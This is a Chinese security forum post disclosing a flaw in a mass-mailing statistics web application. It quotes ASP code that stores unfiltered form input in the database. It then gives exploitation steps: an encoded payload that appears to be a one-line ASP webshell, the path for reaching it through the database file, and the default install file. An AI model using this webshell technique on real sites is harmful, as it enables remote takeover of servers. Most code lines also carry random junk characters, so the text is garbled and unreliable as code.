找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1983|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 3 Q3 l, D3 V* J" S/ _- L

- ~( s# i: b( |( m/ M: TIF Request.QueryString("Action")="del" Then 1 y# j$ j. E- c' W
ID=Request.QueryString("ID")
1 z# I& C/ M- [" n" DIF Countss ("tui","Fenlei",ID )<>0 then & K6 O: m2 E5 q9 V3 i- O
'略 8 c( |4 v8 L2 ?/ f0 ~" d, w( _
IF Request.QueryString("Action")="Add" Then
  l* [. l' f, mTname=Request.Form("Typename") : e% m/ t4 w- ]( p/ O( Z0 D
Set Rs=Server.CreateObject("adodb.Recordset") 2 d1 \- e! M; l7 E
Sql="Select * From Fenlei Order by id Desc "
! M# H) n/ i3 {% [# QRs.Open Sql,Conn,1,3
/ y3 ^* C: |5 WRs.Addnew
& B9 f2 Z6 `! Q/ S" hRs("Typename")=Tname
* }. D/ _% b0 [( E. {. T'略
  g' I& v) Z" XSet Rs=Server.CreateObject("adodb.Recordset")
6 f' _2 A0 w3 {! u1 M. e( BSql="Select * From Fenlei Order by id Desc " 5 T& U5 f2 v# V  I, C: t
Rs.Open Sql,Conn,1,1
2 ]2 O8 \4 m( |0 ~; ?% Q# L'略
% j. T9 c* @$ j- i) X( U! J%>- q- ~  v9 T& D' ]

+ L# ^8 F5 B. S; M$ K" U
# b# v) f3 A( ?0 d+ [0 {
6 h  r" J0 I$ e# \. p% M没有过滤,直接写入数据库。
+ V0 B* B2 u8 S   e2 o3 A! @: ]. P. d' Y
利用方法:
4 z6 a- |; T1 t/ n7 ]1 a8 \   j2 V% B) H( g3 V
插入:┼攠數畣整爠煥敵瑳∨≡┩>8 j6 m5 T+ `5 ?
( K. Z3 P  I. U
7 m8 L4 d. N* a9 K/ ^: h5 |
连接: http://www.xxx.com/###tongbaner.asa
* K( ^8 l! s- b2 c( t" Y5 C'默认安装文件: ! J3 O# J1 A* w
'install.asp/ I0 P+ }0 U. t, J$ Q  o( }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表